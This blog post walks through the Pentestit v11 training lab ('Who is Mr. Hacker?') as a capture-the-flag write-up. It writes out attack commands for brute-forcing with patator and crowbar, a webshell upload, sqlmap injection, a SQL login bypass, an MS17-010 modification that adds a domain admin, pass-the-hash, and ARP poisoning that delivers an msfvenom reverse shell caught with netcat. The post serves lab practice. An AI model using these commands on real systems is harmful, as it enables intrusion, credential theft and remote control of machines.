Pentestit v11

Hey all,

Lately, I’ve been dedicating my spare time to Pentestit v11, a terrific pentest lab which is great to hone those skills.  If you have the spare time, I highly recommend participating –

Version 11 is named “Who is Mr. Hacker?”.  To start, we are given a network diagram and two target IP addresses: and  For this post, I’ve created my own network diagram so I can mark it up along the way.

Obviously there are spoilers ahead.

The Target


External Enumeration

With the initial lab VPN connection established, we begin by scanning the two given IP addresses.


image2.png TCP/80 is a wordpress blog site that doesn’t have much in the way of surface area.  Scanning this site will quickly reveal that there is a web application firewall (WAF) between us and the site.  Note, when scanning, use a different user-agent or you will be filtered.


So not too much, but let’s keep the kittycatfish plugin in mind because we’ll end up using that later. TCP/8080 is a roundcube webmail login page, but without a valid email address it doesn’t offer much in the way of attack surface. TCP/25 is a SMTP server that has VRFY and EXPN disabled.  Additionally, an error message is thrown when trying to enumerate users via RCPT TO, not much there. TCP/2222 is a SSH server using key pair authentication. TCP/88 is a Vtiger v6.3.0 CRM site with a login page which looks promising.



The application version is printed right on the login page in the clear, very kind of vtiger.  For this version, there is an authenticated RCE vulnerability, but first we’ll need to find valid credentials before being able to access this vulnerability.  The vtiger wiki lists the default credentials as admin/admin, but unfortunately the password has been changed.  At this point let’s use patator to start a brute force attack.  There is a anti cross-site request forgery (CSRF) token; however, to be honest, I’m not sure if this is enforced during login as there are no error messages when submitted an incorrect token.  Either way, it’s not a bad idea to GET and POST the correct anti-CSRF token (__vtrftk), just in case.

Using gotmilk’s blog post as a reference I put together this patator startup script.

bulk=$(curl -sD headers.txt -A "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" "")
echo ${bulk}
CSRF=$(echo ${bulk} |grep "sid:" | cut -d ":" -f3 | cut -d ";" -f1)
SESSID=$(cat headers.txt | grep PHPSESSID | cut -d " " -f2 | cut -d ";" -f1)
echo ${CSRF}
echo ${SESSID}

python /root/tools/patator/ http_fuzz url="" method=POST body="__vtrftk=sid:_CSRF_&username=admin&password=FILE0" 0=rockyou.txt follow=1 accept_cookie=0 header="Cookie: ${SESSID}" before_urls="" before_header="Cookie: ${SESSID}" before_egrep='_CSRF_:var csrfMagicToken = "(\S+)"' -x ignore:egrep="Invalid username or password"

As seen above, the wordlist rockyou.txt was used, it’s pretty beefy and will take a while.  I recommend bruteforcing over the night and maybe starting a second bruteforce task in tandem using a reverse rockyou wordlist.  Either that, or just look below.


Also, it’s not a bad idea to do a demo run through burpsuite just to make sure the requests and responses are as expected.  With patator patator (v0.7), add the following:

proxy= proxy_type=http

With valid credentials, we are able to access that authenticated RCE vulnerability.  To navigate to the vulnerable page, start by selecting the gear in the top right corner –> CRM Settings –> Templates –> Company Details –> Edit –> Browse –> Save.  Attempting to upload a php shell will get rejected so instead, upload a image and send the legitimate web transaction to the repeater module in burpsuite.  With repeater, we can submit multiple requests without the hassle of resubmitting and constantly intercepting.  Below is an example of a simple php command shell upload.


If everything worked the webshell should have been uploaded to the /test/logo directory.  Note, if the word “php” is in your shell the page will throw an error.  So if you’re looking to upload a webshell with a few more features like B374K, use a base64 encoded version … just remember to remove “php” at the top.

Exploring the filesystem will quickly reveal the CRM token, named rce_token.txt.


Within the CRM admin page, looking at Darthvader’s user preferences we see some key information that can aid in other attacks.  To see this information, start in the upper right corner and select preferences from the drop down menu named darthvader.


Great, we have an email address which might open up an avenue on the roundcube webmail page.  While Vader is the man when it comes to overthrowing the oppression of the Jedi, fortunately for us, he sucks at passwords.  On roundcube, username: admin@test.lab and password: darthvader.


Copy the private key from the email and SSH into the second office at, as per the network diagram.

ssh tech@ -p 2222 -i ssh-office2-priv.key


As expected, we now have access to subnet or the second office.  In the directory /etc/openvpn there is a openvpn configuration file for connecting to TCP/1194 on


We do not have permissions to read /opt/openvpn/auth.txt; however, it does appear that the authentication username is Office-2.  We will need this file later on but for now, let’s shift focus back to  Scanning each of the endpoints reveals that RDP or TCP/3389 are the only open ports.


With nothing beyond RDP access to the endpoints in subnet, we’re probably looking at a bruteforce attack again.  Using proxychains, enumerate the RDP users on each of the potential targets.

ssh tech@ -D 9000 -p 2222 -i ssh-office2-priv.key
proxychains xfreerdp /sec:tls /u:"" /v:
    • arm554
    • user
    • arm550
    • user
    • arm672
    • user

Naturally, you might think that the user account and maybe even the arm accounts share the same password, not the case.  Take my word for it, bruteforce arm554 on

ssh -L 3389: -p 2222 -i ssh-office2-priv.key tech@
crowbar -u arm554 -s -l log.txt -o out.txt -b rdp -C /usr/share/john/password.lst


RDP into with arm554 and redirect /tmp to transfer files.

proxychains xfreerdp /v: /sec:tls /u:arm554 /p:tiger /drive:test,/tmp/

Arm554 is an underprivileged user account on a vanilla Windows 7 machine without any patches installed.  There are plenty of options, I used a powershell MS16-032 exploit, eliminating the need to compile.  After escalating privileges, we find the token on user’s desktop.


Additionally, there is a directory called “Old test.lab users” which has a collection of files containing details about various users, including a NT hash.  This will work into one of the following challenges, but I’m not going to lie, I missed this the first time around.


There isn’t anything else to grab from, let’s step back and focus on the server.conf openvpn configuration file obtained from  Modify server.conf to bruteforce the openvpn server on by removing the pointer to the auth-user-pass authentication file.  Additionally, copy the certificate to a separate file – openvpn.crt.


And using crowbar we spin up the bruteforce attack.

crowbar -s -b openvpn --config /root/CTFs/Pentestit/v11/server.conf --username Office-2 -k /root/CTFs/Pentestit/v11/openvpn.crt -C /usr/share/john/password.lst


Stepping out, here is where we are at.


By establishing a VPN connection to, we are able to bypass the WAF protecting SITE (


Recall the WordPress Kittycatfish vulnerability which was enumerated with wpscan during external enumeration.

While poking around the vulnerable page, I noticed that the left parameter disappears if the GET request is false.  For example, if kc_ad=16 then left: 50%; is on the page; however, if kc_ad=32 or kc_ad=16 AND 1=2 then left: 50%; is instead : px;.


Knowing this we are able to enumerate with sqlmap using the string switch.  The string switch basically evaluates the server response for the given value and if the value is present on the page then the injection is considered successful.

sqlmap --random-agent -u "" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;"

Using sqlmap, walking through the databases and tables is pretty straightforward, if you need help jump over to the usage guide. The SITE token is in the database and can be enumerated using the sqlmap line below.

sqlmap --random-agent -u "" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;" -D testlabdb -T tl_token --dump



Browsing to responds with two options: admin panel and local storage.  Local storage brings us to a login prompt which is vulnerable to sql injection.  If it’s a bit difficult to see – username: a’ OR 1=1;– / password: whatever


Bypassing the login page brings us to an scan page with quite a few images along with their filenames.  One image filename is entirely different from all the others, plugging the string into a hex to ascii converter gives us the CUPS token.

Additionally, there is an image with a RSA private key, obviously we’ll need that for later.



Enumerating with nmap we find that is a domain controller of the test.lab domain (the name, duh).  Using the metasploit module  auxiliary/gather/kerberos_enumusers we are able to enumerate accounts on the domain.


As seen above, account arm554 is present in the test.lab domain.  Using the information we acquired from the RDP target, pass the hash to gain access to the files fileshare.  Token.txt is the AD token and network_test.txt has credentials for the next challenge.  The contents of network_test.txt is as follows:

Hi, mate! Need to test ARP-table in DIR subnet.
I'll install intercepter admin:77_GrantedSuperAdmin_77


To be honest, the first time through I did not grab the AD token by passing the hash.  Instead, I used MS17-010 to gain access with a few modifications.

def smb_pwn(conn):
        smbConn = conn.get_smbconnection() 
        service_exec(conn, r'cmd /c net user cplsec P@ssw0rd123! /add && net group "domain admins" cplsec /add /domain')



However, don’t fling exploit code where not needed, use pth.

Recall, we acquired an image of a SSH private key for  After unsuccessfully playing around with various OCR solutions, I manually typed out the private key, it was not fun … you’re welcome.


Spin up a SOCKS proxy and connect to using the credentials we acquired from AD.

ssh -D 9000 -i CTFs/Pentestit/v11/manualkey.txt morgan@
proxychains xfreerdp /u:admin /p:77_GrantedSuperAdmin_77 /v: /drive:test,/tmp/

In c:\soft there are a collection of files including Intercepter-NG and netcat for Windows.  Smart scan the network, assign as a target, and set as the gateway.


Use a pcap filter in RAW mode to show traffic from and only.

host or

Start the sniffer, NAT, and ARP poison in the MITM mode section.  If everything was configured correctly we should see a HTTP request which was intercepted from destined for


As seen above, is requesting quake3.exe.  Using msfvenom, generate stageless reverse tcp shell for Windows.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > quake3.exe

Copy quake3.exe over to and using Intercetper’s injection rules, create a rule to inject our reverse shell exe when comes knocking.


Restart the ARP poison attack and start to listen on port 443 with netcat (run as administrator while opening the ports in the host firewall).  Eventually, a reverse shell should spawn from  The token along with a SSH key for can be found in the c:\users\director\documents directory.


Once again, stepping out, here is where we are at.



Posted in CTF

5 thoughts on “Pentestit v11

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s